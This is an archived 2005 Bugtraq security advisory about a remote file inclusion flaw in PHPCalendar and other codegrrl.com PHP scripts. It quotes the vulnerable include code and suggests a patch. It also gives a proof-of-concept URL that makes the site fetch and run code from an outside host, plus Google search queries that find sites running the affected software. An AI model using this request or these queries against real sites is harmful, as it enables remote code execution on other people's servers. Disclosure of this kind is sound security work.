[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    PHPCalendar (and some more codegrrl.com products) arbitrary code
From:       r.verton () gmail ! com
Date:       2005-11-13 11:51:17
Message-ID: 20051113115117.8031.qmail () securityfocus ! com
[Download RAW message or body]

PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================


   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton@gmail.com>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]


   Description:

	Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters \
to mantain a calendar, with all upcoming events and birthdays.  It was designed to be \
used at personal sites, but it can also be very useful for fansites, to keep track of \
tours, premiers, awards shows,   tv apearances, interviews, magazines features, and \
many more! You can see it in use at unfloopy.net.  [http://www.codegrrl.com/]


   Details:

	1) protection.php (with register_globals = On)
	   If register_globals is on an attacker can include an arbitrary php file to \
execute malicious code.  


	   $logout_page = "$siteurl";

	   [...]

	   if ($action == "logout")
	   {
        	Setcookie("logincookie[pwd]","",time() -86400);
        	Setcookie("logincookie[user]","",time() - 86400);
        	@include($logout_page);
		exit;
	   }

   Proof of Concept:

	   To exploit this vulnerability an attacker only has to use the following \
HTTP-Request:  http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt


   Patch:
           Set register_globals in the php.ini off or disallow direct access to the \
protection.php f.e. define constants and use  code like 

	   if( !defined('IN_SYS') ) {
	   	die('Hacking attempt');
	   } 

	   to prevent the direct access
  
   Credits:

       Credit goes to Robin Verton, 15 years old from Germany

   References:

       [1] http://codegrrl.com
       [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about \
                112,000 results]
       [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about \
                44,000 results]
       [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about \
44,000 results]  [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22 
       [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22


   


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic